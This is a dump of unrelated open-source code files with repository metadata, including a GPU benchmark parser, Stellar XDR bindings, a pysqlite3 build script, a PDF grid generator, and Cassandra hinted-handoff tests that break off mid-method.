080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import re
import glob
import argparse
import pandas as pd
list_test = ['alexnet',
'inception3',
'inception4',
'resnet152',
'resnet50',
'vgg16']
# Naming convention
# Key: log name
# Value: ([num_gpus], [names])
# num_gpus: Since each log folder has all the records for the different numbers of GPUs, it is convenient to specify the benchmarks you want to pull by listing the num_gpus
# names: rename the experiments so they are easier to understand
list_system = {
"i7-6850K-GeForce_GTX_1080_Ti": ([1], ['GTX 1080Ti']),
"i7-9750H-GeForce_RTX_2070_with_Max-Q_Design_XLA_TF1_15": ([1], ['RTX 2070 MAX-Q']),
"i7-9750H-GeForce_RTX_2080_with_Max-Q_Design_XLA_TF1_15": ([1], ['RTX 2080 MAX-Q']),
"i7-10875H-GeForce_RTX_2080_Super_with_Max-Q_Design_XLA_TF2_2": ([1], ['RTX 2080 SUPER MAX-Q']),
"Gold_6230-GeForce_RTX_2080_Ti_NVLink_XLA_trt_TF1_15": ([2, 4, 8], ['2x RTX 2080Ti NVLink', '4x RTX 2080Ti NVLink', '8x RTX 2080Ti NVLink']),
"Gold_6230-GeForce_RTX_2080_Ti_XLA_trt_TF1_15": ([1, 2, 4, 8], ['RTX 2080Ti', '2x RTX 2080Ti', '4x RTX 2080Ti', '8x RTX 2080Ti']),
"Platinum-Tesla_V100-SXM3-32GB_HP16_TF2_2": ([1, 8], ['V100 32GB', '8x V100 32GB']),
"Gold_6230-Quadro_RTX_8000_XLA_trt_TF1_15": ([1, 2, 4, 8], ['RTX 8000', '2x RTX 8000', '4x RTX 8000', '8x RTX 8000']),
"Gold_6230-Quadro_RTX_8000_NVLink_XLA_trt_TF1_15": ([2, 4, 8], ['2x RTX 8000 NVLink', '4x RTX 8000 NVLink', '8x RTX 8000 NVLink']),
"7502-A100-PCIE-40GB": ([1, 2, 4, 8], ['A100 40GB PCIe', '2x A100 40GB PCIe', '4x A100 40GB PCIe', '8x A100 40GB PCIe']),
"3960X-GeForce_RTX_3080_XLA": ([1, 2], ['RTX 3080', '2x RTX 3080']),
"3970X-GeForce_RTX_3090_XLA": ([1, 2, 3], ['RTX 3090', '2x RTX 3090', '3x RTX 3090']),
"7502-RTX_A6000_XLA_TF1_15": ([1, 2, 4, 8], ['RTX A6000', '2x RTX A6000', '4x RTX A6000', '8x RTX A6000'])
}
def get_result(path_logs, folder, model):
folder_path = glob.glob(path_logs + '/' + folder + '/' + model + '*')[0]
folder_name = folder_path.split('/')[-1]
batch_size = folder_name.split('-')[-1]
file_throughput = folder_path + '/throughput/1'
with open(file_throughput, 'r') as f:
lines = f.read().splitlines()
line = lines[-2]
throughput = line.split(' ')[-1]
try:
throughput = int(round(float(throughput)))
except:
throughput = 0
return batch_size, throughput
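# Example of the folder layout this parser assumes (illustrative names only):
#   logs/<system>.logs/syn-replicated-fp32-1gpus/resnet50-64/throughput/1
# The trailing "-64" of the model folder is read back as the batch size, and the
# second-to-last line of the throughput file is taken as the throughput figure.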
def create_row_throughput(path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True):
if is_train:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus'
else:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus' + '-inference'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus' + '-inference'
for model in list_test:
if precision == 'fp32':
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = throughput
df.at[name, 'num_gpu'] = num_gpu
def create_row_batch_size(path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True):
if is_train:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus'
else:
if precision == 'fp32':
folder_fp32 = key + '.logs/' + data + '-' + mode + '-fp32-' + str(num_gpu)+'gpus' + '-inference'
else:
folder_fp16 = key + '.logs/' + data + '-' + mode + '-fp16-' + str(num_gpu)+'gpus' + '-inference'
for model in list_test:
if precision == 'fp32':
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = int(batch_size) * num_gpu
df.at[name, 'num_gpu'] = num_gpu
def main():
parser = argparse.ArgumentParser(description='Gather benchmark results.')
parser.add_argument('--path', type=str, default='logs',
help='path that has the logs')
parser.add_argument('--mode', type=str, default='replicated',
choices=['replicated', 'parameter_server'],
help='Method for parameter update')
parser.add_argument('--data', type=str, default='syn',
choices=['syn', 'real'],
help='Choose between synthetic data and real data')
parser.add_argument('--precision', type=str, default='fp32',
choices=['fp32', 'fp16'],
help='Choose becnhmark precision')
args = parser.parse_args()
columns = []
columns.append('num_gpu')
for model in list_test:
columns.append(model)
list_row = []
for key, value in sorted(list_system.items()):
for name in value[1]:
list_row.append(name)
# Train Throughput
df_throughput = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
# list_gpus = list_system[key][0]
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_throughput(args.path, args.mode, args.data, args.precision, key, num_gpu, name, df_throughput)
df_throughput.index.name = 'name_gpu'
df_throughput.to_csv('tf-train-throughput-' + args.precision + '.csv')
# # Inference Throughput
# df_throughput = pd.DataFrame(index=list_row, columns=columns)
# for key in list_system:
# list_gpus = list_system[key]
# for num_gpu in list_gpus:
# create_row_throughput(args.path, args.mode, key, num_gpu, df_throughput, False)
# df_throughput.index.name = 'name_gpu'
# df_throughput.to_csv('tf-inference-throughput-' + precision + '.csv')
# Train Batch Size
df_bs = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_batch_size(args.path, args.mode, args.data, args.precision, key, num_gpu, name, df_bs)
df_bs.index.name = 'name_gpu'
df_bs.to_csv('tf-train-bs-' + args.precision + '.csv')
if __name__ == "__main__":
main()
| 38.028249
| 167
| 0.606002
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,545
| 0.378101
|
65b51ba1b7053c61b8b8e0893b561770fa90e439
| 22
|
py
|
Python
|
python/testData/keywordCompletion/noneInArgList.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/keywordCompletion/noneInArgList.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/keywordCompletion/noneInArgList.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo(x=Non<caret>):
| 22
| 22
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65b8b4c75d35105b5ff106a11aa54530eaf30029
| 2,687
|
py
|
Python
|
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | null | null | null |
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | 27
|
2022-01-12T10:55:38.000Z
|
2022-03-28T01:38:24.000Z
|
stellar_sdk/xdr/survey_response_body.py
|
Shaptic/py-stellar-base
|
f5fa47f4d96f215889d99249fb25c7be002f5cf3
|
[
"Apache-2.0"
] | 2
|
2021-12-02T12:42:03.000Z
|
2021-12-07T20:53:10.000Z
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from ..type_checked import type_checked
from .survey_message_command_type import SurveyMessageCommandType
from .topology_response_body import TopologyResponseBody
__all__ = ["SurveyResponseBody"]
@type_checked
class SurveyResponseBody:
"""
XDR Source Code::
union SurveyResponseBody switch (SurveyMessageCommandType type)
{
case SURVEY_TOPOLOGY:
TopologyResponseBody topologyResponseBody;
};
"""
def __init__(
self,
type: SurveyMessageCommandType,
topology_response_body: TopologyResponseBody = None,
) -> None:
self.type = type
self.topology_response_body = topology_response_body
def pack(self, packer: Packer) -> None:
self.type.pack(packer)
if self.type == SurveyMessageCommandType.SURVEY_TOPOLOGY:
if self.topology_response_body is None:
raise ValueError("topology_response_body should not be None.")
self.topology_response_body.pack(packer)
return
@classmethod
def unpack(cls, unpacker: Unpacker) -> "SurveyResponseBody":
type = SurveyMessageCommandType.unpack(unpacker)
if type == SurveyMessageCommandType.SURVEY_TOPOLOGY:
topology_response_body = TopologyResponseBody.unpack(unpacker)
return cls(type=type, topology_response_body=topology_response_body)
return cls(type=type)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "SurveyResponseBody":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "SurveyResponseBody":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.type == other.type
and self.topology_response_body == other.topology_response_body
)
def __str__(self):
out = []
out.append(f"type={self.type}")
out.append(
f"topology_response_body={self.topology_response_body}"
) if self.topology_response_body is not None else None
return f"<SurveyResponseBody [{', '.join(out)}]>"
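# A minimal round-trip sketch (assumes `topology_body` is a valid TopologyResponseBody):
#     body = SurveyResponseBody(
#         type=SurveyMessageCommandType.SURVEY_TOPOLOGY,
#         topology_response_body=topology_body,
#     )
#     assert SurveyResponseBody.from_xdr(body.to_xdr()) == body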
| 32.373494
| 80
| 0.668031
| 2,330
| 0.867138
| 0
| 0
| 2,344
| 0.872348
| 0
| 0
| 542
| 0.201712
|
65b9bd2ad1163a0006a5a233a9d9d9cd5e6a3646
| 763
|
py
|
Python
|
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-14 22:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('poll', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Topic',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topic_name', models.CharField(max_length=50)),
('topic_descrption', models.CharField(max_length=255)),
],
),
migrations.AddField(
model_name='question',
name='topics',
field=models.ManyToManyField(related_name='questions', to='poll.Topic'),
),
]
| 28.259259
| 114
| 0.571429
| 670
| 0.878113
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.200524
|
65b9efe5fd413429042a21c46095ea299b352b7a
| 370
|
py
|
Python
|
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
from typing import List
class Solution:
def longestSubarray(self, nums: List[int]) -> int:
k = 1
max_len, i = 0, 0
for j in range(len(nums)):
if nums[j] == 0:
k -= 1
if k < 0:
if nums[i] == 0:
k += 1
i += 1
max_len = max(max_len, j - i)
return max_len
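# Example: nums = [1, 1, 0, 1] -> 3 (delete the single 0 and keep [1, 1, 1]).
# The window [i, j] never holds more than one zero, so its best answer is j - i:
# the window length minus the one element that must be deleted.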
| 23.125
| 54
| 0.37027
| 369
| 0.997297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65bb496751451a7bd133a1ac2b24c5b70ac17431
| 5,375
|
py
|
Python
|
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
# -*- coding: ISO-8859-1 -*-
# setup.py: the distutils script
#
import os
import setuptools
import sys
from distutils import log
from distutils.command.build_ext import build_ext
from setuptools import Extension
# If you need to change anything, it should be enough to change setup.cfg.
PACKAGE_NAME = 'pysqlite3'
VERSION = '0.4.1'
# define sqlite sources
sources = [os.path.join('src', source)
for source in ["module.c", "connection.c", "cursor.c", "cache.c",
"microprotocols.c", "prepare_protocol.c",
"statement.c", "util.c", "row.c", "blob.c"]]
# define packages
packages = [PACKAGE_NAME]
EXTENSION_MODULE_NAME = "._sqlite3"
# Work around clang raising hard error for unused arguments
if sys.platform == "darwin":
os.environ['CFLAGS'] = "-Qunused-arguments"
log.info("CFLAGS: " + os.environ['CFLAGS'])
def quote_argument(arg):
quote = '"' if sys.platform != 'win32' else '\\"'
return quote + arg + quote
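# e.g. quote_argument('pysqlite3.dbapi2') wraps the value in plain double quotes
# (escaped as \" on win32), so the MODULE_NAME macro expands to a C string literal.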
define_macros = [('MODULE_NAME', quote_argument(PACKAGE_NAME + '.dbapi2'))]
class SystemLibSqliteBuilder(build_ext):
description = "Builds a C extension linking against libsqlite3 library"
def build_extension(self, ext):
log.info(self.description)
# For some reason, when setup.py develop is run, it ignores the
# configuration in setup.cfg, so we just explicitly add libsqlite3.
# Oddly, running setup.py build_ext -i (for in-place) works fine and
# correctly reads the setup.cfg.
ext.libraries.append('sqlite3')
build_ext.build_extension(self, ext)
class AmalgationLibSqliteBuilder(build_ext):
description = "Builds a C extension using a sqlite3 amalgamation"
amalgamation_root = "."
amalgamation_header = os.path.join(amalgamation_root, 'sqlite3.h')
amalgamation_source = os.path.join(amalgamation_root, 'sqlite3.c')
amalgamation_message = ('Sqlite amalgamation not found. Please download '
'or build the amalgamation and make sure the '
'following files are present in the pysqlite3 '
'folder: sqlite3.h, sqlite3.c')
def check_amalgamation(self):
if not os.path.exists(self.amalgamation_root):
os.mkdir(self.amalgamation_root)
header_exists = os.path.exists(self.amalgamation_header)
source_exists = os.path.exists(self.amalgamation_source)
if not header_exists or not source_exists:
raise RuntimeError(self.amalgamation_message)
def build_extension(self, ext):
log.info(self.description)
# it is the responsibility of the user to provide the amalgamation
self.check_amalgamation()
# Feature-ful library.
features = (
'ALLOW_COVERING_INDEX_SCAN',
'ENABLE_FTS3',
'ENABLE_FTS3_PARENTHESIS',
'ENABLE_FTS4',
'ENABLE_FTS5',
'ENABLE_JSON1',
'ENABLE_LOAD_EXTENSION',
'ENABLE_RTREE',
'ENABLE_STAT4',
'ENABLE_UPDATE_DELETE_LIMIT',
'SOUNDEX',
'USE_URI',
)
for feature in features:
ext.define_macros.append(('SQLITE_%s' % feature, '1'))
# Always use memory for temp store.
ext.define_macros.append(("SQLITE_TEMP_STORE", "3"))
ext.include_dirs.append(self.amalgamation_root)
ext.sources.append(os.path.join(self.amalgamation_root, "sqlite3.c"))
if sys.platform != "win32":
# Include math library, required for fts5.
ext.extra_link_args.append("-lm")
build_ext.build_extension(self, ext)
def __setattr__(self, k, v):
# Make sure we don't link against the SQLite
# library, no matter what setup.cfg says
if k == "libraries":
v = None
self.__dict__[k] = v
def get_setup_args():
return dict(
name=PACKAGE_NAME,
version=VERSION,
description="DB-API 2.0 interface for Sqlite 3.x",
long_description='',
author="Charles Leifer",
author_email="coleifer@gmail.com",
license="zlib/libpng",
platforms="ALL",
url="https://github.com/coleifer/pysqlite3",
package_dir={PACKAGE_NAME: "pysqlite3"},
packages=packages,
ext_modules=[Extension(
name=PACKAGE_NAME + EXTENSION_MODULE_NAME,
sources=sources,
define_macros=define_macros)
],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: zlib/libpng License",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Programming Language :: C",
"Programming Language :: Python",
"Topic :: Database :: Database Engines/Servers",
"Topic :: Software Development :: Libraries :: Python Modules"],
cmdclass={
"build_static": AmalgationLibSqliteBuilder,
"build_ext": SystemLibSqliteBuilder
}
)
def main():
try:
setuptools.setup(**get_setup_args())
except BaseException as ex:
log.info(str(ex))
if __name__ == "__main__":
main()
| 32.97546
| 77
| 0.618233
| 2,833
| 0.52707
| 0
| 0
| 0
| 0
| 0
| 0
| 2,095
| 0.389767
|
65bc3f6e1793bcf43d99a8c4a348a352385aa4a0
| 5,267
|
py
|
Python
|
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | 2
|
2016-09-07T18:32:44.000Z
|
2016-11-24T19:45:06.000Z
|
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | null | null | null |
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import cairo
from .utils import hex_to_rgba, parse_unit
def parse_size(size):
"""take a size as str (e.g. 14px), return its value in px/pt as int
"""
if hasattr(size, 'isdigit'):
if size.isdigit():
return int(size)
return parse_unit(size[:-2], size[-2:])
return size
def parse_size_shorthand(shorthand):
tokens = shorthand.split()
l = len(tokens)
if l == 1:
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[0]), 'bottom': parse_size(tokens[0]), 'left': parse_size(tokens[0])}
if l == 2:
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[1]), 'bottom': parse_size(tokens[0]), 'left': parse_size(tokens[1])}
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[1]), 'bottom': parse_size(tokens[2]), 'left': parse_size(tokens[3])}
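# CSS-style shorthand, e.g. parse_size_shorthand('10') gives 10 on all four sides,
# parse_size_shorthand('10 20') -> {'top': 10, 'right': 20, 'bottom': 10, 'left': 20},
# and a four-token value maps to top/right/bottom/left in that order.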
def hex_to_cairo(value, alpha=1.0):
value = hex_to_rgba(value, alpha)
rgb = [v / 255.0 for v in value[:3]]
rgb.append(value[-1])
return tuple(rgb)
class PDFGridder(object):
def __init__(self, grid):
self.grid = grid
self.paper = {
'width': str(grid.width) + grid.width_unit,
'height': str(grid.height) + grid.height_unit,
}
self.columns = {
'count': grid.columns,
'color': grid.columns_color,
'opacity': grid.columns_opacity,
'gutter': grid.columns_gutter_str()
}
self.baseline = {
'distance': str(grid.baseline) + grid.baseline_unit,
'color': grid.baseline_color,
'opacity': grid.baseline_opacity,
}
self.margin = grid.margins()
self.margin_size = parse_size_shorthand(self.margin)
self.is_spread = grid.is_spread
self.rows = {
'count': 0,
'gutter': 0,
'color': '#ccc',
'opacity': 0.5
}
def draw_cols(self, bottom, w):
cols = self.columns['count']
if cols > 0:
cols_gutter_size = parse_size(self.columns['gutter'])
cols_width = (w / cols) - cols_gutter_size + (cols_gutter_size / cols) - (self.margin_size['left'] / cols) - (self.margin_size['right'] / cols)
cols_offset = cols_width + cols_gutter_size
cols_color = hex_to_cairo(self.columns['color'], self.columns['opacity'])
for i in xrange(cols):
self.ctx.rectangle(i * cols_offset + self.margin_size['left'], 0, cols_width, bottom)
self.ctx.set_source_rgba(*cols_color) # Solid color
self.ctx.fill()
def draw_rows(self, rows, h):
#rows
rows_count = rows['count']
if rows_count:
rows_gutter_size = parse_size(rows['gutter'])
rows_color = hex_to_cairo(rows['color'], rows['opacity'])
rows_height = (h / rows_count) - rows_gutter_size + (rows_gutter_size / rows_count) - (self.margin_size['top'] / rows_count) - (self.margin_size['bottom'] / rows_count)
rows_offset = rows_height + rows_gutter_size
for i in xrange(rows_count):
self.ctx.rectangle(
self.margin_size['left'],
i * rows_offset,
rows_height,
self.margin_size['right']
)
self.ctx.set_source_rgba(*rows_color) # Solid color
self.ctx.fill()
def draw_baselines(self, distance, w, bottom, lines_color):
base_offset = distance
while base_offset < bottom:
self.ctx.move_to(self.margin_size['left'], base_offset)
self.ctx.line_to(w - self.margin_size['right'], base_offset)
base_offset = base_offset + distance
self.ctx.set_source_rgba(*lines_color) # Solid color
self.ctx.set_line_width(0.25)
self.ctx.stroke()
def build_page(self, surface, h_flip=False):
w, h = parse_size(self.paper['width']), parse_size(self.paper['height'])
if h_flip:
self.margin_size['left'], self.margin_size['right'] = self.margin_size['right'], self.margin_size['left']
self.ctx = cairo.Context(surface)
#ctx.scale (w/1.0, h/1.0) # Normalizing the canvas
self.ctx.translate(0, self.margin_size['top'])
bottom = h - self.margin_size['bottom'] - self.margin_size['top']
self.draw_cols(bottom, w)
self.draw_rows(self.rows, h)
#baseline
try:
lines_color = hex_to_cairo(self.baseline['color'], self.baseline['opacity'])
except ValueError:
lines_color = None
distance = parse_size(self.baseline['distance'])
if distance > 0 and lines_color is not None:
self.draw_baselines(distance, w, bottom, lines_color)
return self.ctx
def build(self, output='output.pdf'):
w, h = parse_size(self.paper['width']), parse_size(self.paper['height'])
surface = cairo.PDFSurface(output, w, h)
self.build_page(surface=surface)
surface.show_page()
if self.is_spread:
self.build_page(surface=surface, h_flip=True)
surface.show_page()
surface.finish()
return output
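# Typical use (a sketch; assumes `grid` exposes the width/height, columns, baseline
# and margin attributes read in __init__ above):
#     output_path = PDFGridder(grid).build('grid.pdf')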
| 36.324138
| 180
| 0.58838
| 4,221
| 0.801405
| 0
| 0
| 0
| 0
| 0
| 0
| 626
| 0.118853
|
65bc5bc0726d3703c47b9225540efbf4baf75f28
| 462
|
py
|
Python
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 12
|
2019-04-30T13:11:52.000Z
|
2021-05-14T02:52:05.000Z
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 323
|
2018-07-13T00:39:22.000Z
|
2022-03-31T19:29:08.000Z
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 9
|
2020-02-14T14:56:00.000Z
|
2022-01-09T19:14:07.000Z
|
ROOT_WK_API_URL = "https://api.wanikani.com/v2/"
RESOURCES_WITHOUT_IDS = ["user", "collection", "report"]
SUBJECT_ENDPOINT = "subjects"
SINGLE_SUBJECT_ENPOINT = r"subjects/\d+"
ASSIGNMENT_ENDPOINT = "assignments"
REVIEW_STATS_ENDPOINT = "review_statistics"
STUDY_MATERIALS_ENDPOINT = "study_materials"
REVIEWS_ENDPOINT = "reviews"
LEVEL_PROGRESSIONS_ENDPOINT = "level_progressions"
RESETS_ENDPOINT = "resets"
SUMMARY_ENDPOINT = "summary"
USER_ENDPOINT = "user"
| 33
| 56
| 0.798701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.393939
|
65bd680ebf2391800df849001a9518d85eba50ba
| 1,943
|
py
|
Python
|
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | 9
|
2021-06-17T00:46:19.000Z
|
2022-03-05T13:57:38.000Z
|
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | null | null | null |
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | null | null | null |
from inversefed import consts
import torch
from torchvision import datasets, transforms
class DataLoader:
def __init__(self, data, device):
self.data = data
self.device = device
def get_mean_std(self):
if self.data == 'cifar10':
mean, std = consts.cifar10_mean, consts.cifar10_std
elif self.data == 'cifar100':
mean, std = consts.cifar100_mean, consts.cifar100_std
elif self.data == 'mnist':
mean, std = consts.mnist_mean, consts.mnist_std
elif self.data == 'imagenet':
mean, std = consts.imagenet_mean, consts.imagenet_std
else:
raise Exception("dataset not found")
return mean, std
def get_data_info(self):
mean, std = self.get_mean_std()
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean, std)])
dm = torch.as_tensor(mean)[:, None, None].to(self.device)
ds = torch.as_tensor(std)[:, None, None].to(self.device)
data_root = 'data/cifar_data'
# data_root = '~/.torch'
if self.data == 'cifar10':
dataset = datasets.CIFAR10(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'cifar100':
dataset = datasets.CIFAR100(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'mnist':
dataset = datasets.MNIST(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'imagenet':
dataset = datasets.ImageNet(root=data_root, download=True, train=False, transform=transform)
else:
raise Exception("dataset not found, load your own datasets")
data_shape = dataset[0][0].shape
classes = dataset.classes
return dataset, data_shape, classes, (dm, ds)
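# Typical use (downloads the test split if needed), e.g.:
#     loader = DataLoader('cifar10', torch.device('cpu'))
#     dataset, data_shape, classes, (dm, ds) = loader.get_data_info()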
| 39.653061
| 104
| 0.609882
| 1,846
| 0.950077
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.094184
|
65be1830984a29d7acd4c26b6de2aa0995caf8fb
| 10,651
|
py
|
Python
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 44
|
2017-07-13T14:20:42.000Z
|
2022-03-27T23:55:27.000Z
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 64
|
2017-07-26T16:06:01.000Z
|
2022-03-17T22:57:03.000Z
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 105
|
2017-07-13T14:28:14.000Z
|
2022-03-23T04:22:46.000Z
|
import os
import time
import pytest
import logging
from cassandra import ConsistencyLevel
from dtest import Tester, create_ks
from tools.data import create_c1c2_table, insert_c1c2, query_c1c2
from tools.assertions import assert_stderr_clean
since = pytest.mark.since
ported_to_in_jvm = pytest.mark.ported_to_in_jvm
logger = logging.getLogger(__name__)
@since('3.0')
class TestHintedHandoffConfig(Tester):
"""
Tests the hinted handoff configuration options introduced in
CASSANDRA-9035.
@jira_ticket CASSANDRA-9035
"""
def _start_two_node_cluster(self, config_options=None):
"""
Start a cluster with two nodes and return them
"""
cluster = self.cluster
if config_options:
cluster.set_configuration_options(values=config_options)
cluster.populate([2]).start()
return cluster.nodelist()
def _launch_nodetool_cmd(self, node, cmd):
"""
Launch a nodetool command and check there is no error, return the result
"""
out, err, _ = node.nodetool(cmd)
assert_stderr_clean(err)
return out
def _do_hinted_handoff(self, node1, node2, enabled, keyspace='ks'):
"""
Test that if we stop one node the other one
will store hints only when hinted handoff is enabled
"""
session = self.patient_exclusive_cql_connection(node1)
create_ks(session, keyspace, 2)
create_c1c2_table(self, session)
node2.stop(wait_other_notice=True)
insert_c1c2(session, n=100, consistency=ConsistencyLevel.ONE)
log_mark = node1.mark_log()
node2.start()
if enabled:
node1.watch_log_for(["Finished hinted"], from_mark=log_mark, timeout=120)
node1.stop(wait_other_notice=True)
# Check node2 for all the keys that should have been delivered via HH if enabled or not if not enabled
session = self.patient_exclusive_cql_connection(node2, keyspace=keyspace)
for n in range(0, 100):
if enabled:
query_c1c2(session, n, ConsistencyLevel.ONE)
else:
query_c1c2(session, n, ConsistencyLevel.ONE, tolerate_missing=True, must_be_missing=True)
@ported_to_in_jvm('4.0')
def test_nodetool(self):
"""
Test various nodetool commands
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._launch_nodetool_cmd(node, 'disablehandoff')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is not running' == res.rstrip()
self._launch_nodetool_cmd(node, 'enablehandoff')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._launch_nodetool_cmd(node, 'disablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
self._launch_nodetool_cmd(node, 'enablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
